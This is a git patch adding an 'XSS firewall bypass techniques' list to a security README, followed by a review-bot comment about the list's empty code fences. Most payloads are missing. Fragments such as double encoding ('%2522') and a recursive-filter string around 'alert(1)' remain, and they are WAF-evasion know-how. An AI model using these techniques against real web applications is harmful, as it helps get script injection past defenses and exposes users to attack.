From b6d25c758a7f5c72824ca6f3356b7d6c356bc8cd Mon Sep 17 00:00:00 2001 From: Xalgord <48483027+xalgord@users.noreply.github.com> Date: Sat, 20 Feb 2021 16:26:49 +0530 Subject: [PATCH] Update README.md --- README.md | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 81dadd5..c81713e 100644 --- a/README.md +++ b/README.md @@ -266,22 +266,34 @@ Here’s list of tools [@_justYnot](https://twitter.com/_justYnot) used: ## XSS firewall bypass techniques Here’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application: 1. Check if the firewall is blocking only lowercase: - +``` + +``` 2. Try to break firewall regex with new line (\r\n), aka. CRLF injection: +``` +``` 3. Try double encoding: +``` %2522 +``` 4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload: +``` ipt>alert(1);ipt> +``` 5. Injecting anchor tag without whitespaces: +``` +``` 6. Try to bypass whitespaces using a bullet: +``` +``` 7. Try to change request method (POST instead of GET):
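Review bot: the code fences added under items 1, 2, 5 and 6 of the new "XSS firewall bypass techniques" list are empty in this hunk, and item 7 ends with a colon with nothing following it, so a reader gets the heading of each technique but not the thing it is supposed to illustrate; either fill in what each fence is meant to show or drop the empty fences until the content is ready. Item 4 has a related problem: the text says "if firewall removes the text in bold", but markdown bold cannot render inside a ``` fence, so the reader cannot tell which part is stripped by the filter; describe the removed substring in words or mark it in inline text outside the fence. On style, the fences are placed at column 0 between numbered items rather than indented under them, which breaks the ordered list into seven single-item lists when rendered, and they carry no language tag (e.g. `html` or `http`), which the rest of the README's fenced blocks would benefit from for consistent highlighting.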